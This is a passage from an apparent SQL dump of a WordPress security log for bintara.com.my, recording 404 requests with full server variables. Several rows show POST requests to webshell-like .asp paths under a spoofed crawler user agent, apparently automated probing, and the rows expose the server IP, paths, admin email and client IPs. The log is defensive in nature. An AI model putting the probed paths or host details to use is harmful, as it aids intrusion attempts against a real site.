Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"122.78.157.101\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"122.78.157.101\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/main/index.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/main/index.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-A1a6CYj3S7An3VFFeyAAAAU8\";s:12:\"REDIRECT_URL\";s:15:\"/main/index.asp\";s:11:\"REMOTE_ADDR\";s:14:\"218.88.205.164\";s:11:\"REMOTE_PORT\";s:5:\"60336\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/main/index.asp\";s:10:\"SCRIPT_URL\";s:15:\"/main/index.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-A1a6CYj3S7An3VFFeyAAAAU8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571799253.2392\";s:12:\"REQUEST_TIME\";s:10:\"1571799253\";}}','notice','2019-10-23 02:54:15','2019-10-23 02:54:13',35271840,37072296,'http://bintara.com.my//main/index.asp',1,0,'122.78.157.101'),(28769,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"//images/showying.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"816\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"202.112.20.206\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"202.112.20.206\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:41:\"http://bintara.com.my/images/showying.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/images/showying.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-A4a6CYj3S7An3VFFe0AAAAUY\";s:12:\"REDIRECT_URL\";s:20:\"/images/showying.asp\";s:11:\"REMOTE_ADDR\";s:14:\"218.88.205.164\";s:11:\"REMOTE_PORT\";s:5:\"60965\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:41:\"http://bintara.com.my/images/showying.asp\";s:10:\"SCRIPT_URL\";s:20:\"/images/showying.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-A4a6CYj3S7An3VFFe0AAAAUY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571799265.5709\";s:12:\"REQUEST_TIME\";s:10:\"1571799265\";}}','notice','2019-10-23 02:54:27','2019-10-23 02:54:26',35339584,37143632,'http://bintara.com.my//images/showying.asp',1,0,'202.112.20.206'),(28770,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:71:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"89948443-2443-4218-8313-9BE1F8A248AA\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-G8daMiBShLW1lPtcQugAAAAc\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"175.139.175.208\";s:11:\"REMOTE_PORT\";s:5:\"52127\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa-G8daMiBShLW1lPtcQugAAAAc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571800817.466\";s:12:\"REQUEST_TIME\";s:10:\"1571800817\";}}','notice','2019-10-23 03:20:21','2019-10-23 03:20:17',35671488,37465696,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.139.175.208'),(28771,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"/information-security/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:195:\"Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:44:\"https://bintara.com.my/information-security/\";s:19:\"REDIRECT_SCRIPT_URL\";s:22:\"/information-security/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-KG9aMiBShLW1lPtcR2gAAABg\";s:12:\"REDIRECT_URL\";s:22:\"/information-security/\";s:11:\"REMOTE_ADDR\";s:12:\"40.77.167.50\";s:11:\"REMOTE_PORT\";s:5:\"12591\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:44:\"https://bintara.com.my/information-security/\";s:10:\"SCRIPT_URL\";s:22:\"/information-security/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa-KG9aMiBShLW1lPtcR2gAAABg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571801628.0018\";s:12:\"REQUEST_TIME\";s:10:\"1571801628\";}}','notice','2019-10-23 03:33:50','2019-10-23 03:33:48',33805040,35607512,'https://bintara.com.my/information-security/',1,0,'40.77.167.50'),(28772,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"//images/img/img.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"817\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"210.53.154.77\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"210.53.154.77\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/images/img/img.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/images/img/img.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-Rse4vBmywCERyagfsGgAAARY\";s:12:\"REDIRECT_URL\";s:19:\"/images/img/img.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"51035\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/images/img/img.asp\";s:10:\"SCRIPT_URL\";s:19:\"/images/img/img.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-Rse4vBmywCERyagfsGgAAARY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571803569.8371\";s:12:\"REQUEST_TIME\";s:10:\"1571803569\";}}','notice','2019-10-23 04:06:13','2019-10-23 04:06:10',35736848,37536240,'http://bintara.com.my//images/img/img.asp',1,0,'210.53.154.77'),(28773,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"//images/img/img.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"682\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"59.151.48.144\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"59.151.48.144\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/images/img/img.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/images/img/img.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-Rue4vBmywCERyagfsGwAAARg\";s:12:\"REDIRECT_URL\";s:19:\"/images/img/img.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"51035\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/images/img/img.asp\";s:10:\"SCRIPT_URL\";s:19:\"/images/img/img.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-Rue4vBmywCERyagfsGwAAARg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571803577.5181\";s:12:\"REQUEST_TIME\";s:10:\"1571803577\";}}','notice','2019-10-23 04:06:19','2019-10-23 04:06:17',35269712,37076920,'http://bintara.com.my//images/img/img.asp',1,0,'59.151.48.144'),(28774,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"//banner/xiaying.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"817\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"203.207.248.50\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"203.207.248.50\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/banner/xiaying.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/banner/xiaying.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-RweHARMCuuKQiJT-8ggAAAMo\";s:12:\"REDIRECT_URL\";s:19:\"/banner/xiaying.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"51768\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/banner/xiaying.asp\";s:10:\"SCRIPT_URL\";s:19:\"/banner/xiaying.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-RweHARMCuuKQiJT-8ggAAAMo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571803586.0696\";s:12:\"REQUEST_TIME\";s:10:\"1571803586\";}}','notice','2019-10-23 04:06:28','2019-10-23 04:06:26',35337496,37136768,'http://bintara.com.my//banner/xiaying.asp',1,0,'203.207.248.50'),(28775,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"//banner/xiaying.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"682\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"218.249.20.105\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"218.249.20.105\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/banner/xiaying.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/banner/xiaying.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-RyOHARMCuuKQiJT-8hAAAAMw\";s:12:\"REDIRECT_URL\";s:19:\"/banner/xiaying.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"51768\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/banner/xiaying.asp\";s:10:\"SCRIPT_URL\";s:19:\"/banner/xiaying.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-RyOHARMCuuKQiJT-8hAAAAMw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571803592.9527\";s:12:\"REQUEST_TIME\";s:10:\"1571803592\";}}','notice','2019-10-23 04:06:34','2019-10-23 04:06:33',35268032,37074688,'http://bintara.com.my//banner/xiaying.asp',1,0,'218.249.20.105'),(28776,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//ziliao/Logout.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"818\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"121.193.162.44\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"121.193.162.44\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/ziliao/Logout.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/ziliao/Logout.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa-RzuHARMCuuKQiJT-8hgAAAMM\";s:12:\"REDIRECT_URL\";s:18:\"/ziliao/Logout.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"51768\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/ziliao/Logout.asp\";s:10:\"SCRIPT_URL\";s:18:\"/ziliao/Logout.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa-RzuHARMCuuKQiJT-8hgAAAMM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571803598.5481\";s:12:\"REQUEST_TIME\";s:10:\"1571803598\";}}','notice','2019-10-23 04:06:40','2019-10-23 